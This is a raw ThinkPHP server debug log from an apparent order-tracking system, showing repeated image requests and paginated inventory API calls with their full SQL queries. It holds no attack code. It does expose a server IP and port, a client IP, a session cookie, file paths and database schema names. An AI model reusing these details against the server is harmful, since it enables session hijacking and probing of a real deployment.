`orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308507>orderinfo.end_time desc,1658308507>orderinfo.end_time desc,1658308507-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 10,10 [ RunTime:0.002561s ] --------------------------------------------------------------- [ 2022-07-20T17:15:07+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021297s][吞吐率:46.96req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000064s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001149s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:07+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019088s][吞吐率:52.39req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001054s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:08+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019686s][吞吐率:50.80req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001032s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:08+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019942s][吞吐率:50.15req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001131s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:09+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020099s][吞吐率:49.75req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000062s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001157s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:09+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=2&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=2&pageNum=10 [运行时间:0.050414s][吞吐率:19.84req/s] [内存消耗:4,769.92kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001091s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '2', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001460s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000569s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001387s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000350s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001474s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001032s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308509>orderinfo.end_time desc,1658308509>orderinfo.end_time desc,1658308509-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 20,10 [ RunTime:0.002610s ] --------------------------------------------------------------- [ 2022-07-20T17:15:09+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.022231s][吞吐率:44.98req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001380s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:10+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019833s][吞吐率:50.42req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001185s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:10+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020422s][吞吐率:48.97req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001119s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:10+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021501s][吞吐率:46.51req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001217s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:11+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020651s][吞吐率:48.42req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000069s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001271s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:11+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020808s][吞吐率:48.06req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001082s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:11+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=3&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=3&pageNum=10 [运行时间:0.052184s][吞吐率:19.16req/s] [内存消耗:4,769.90kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001169s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '3', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001712s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000526s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001508s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000412s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001533s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001208s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308511>orderinfo.end_time desc,1658308511>orderinfo.end_time desc,1658308511-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 30,10 [ RunTime:0.002410s ] --------------------------------------------------------------- [ 2022-07-20T17:15:11+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021896s][吞吐率:45.67req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001241s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:12+08:00 ] 221.192.178.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.026839s][吞吐率:37.26req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001050s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001508s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000092s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:12+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020256s][吞吐率:49.37req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000063s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001108s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:12+08:00 ] 221.192.178.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.029310s][吞吐率:34.12req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001127s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001629s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000116s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:12+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020276s][吞吐率:49.32req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001264s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:13+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png 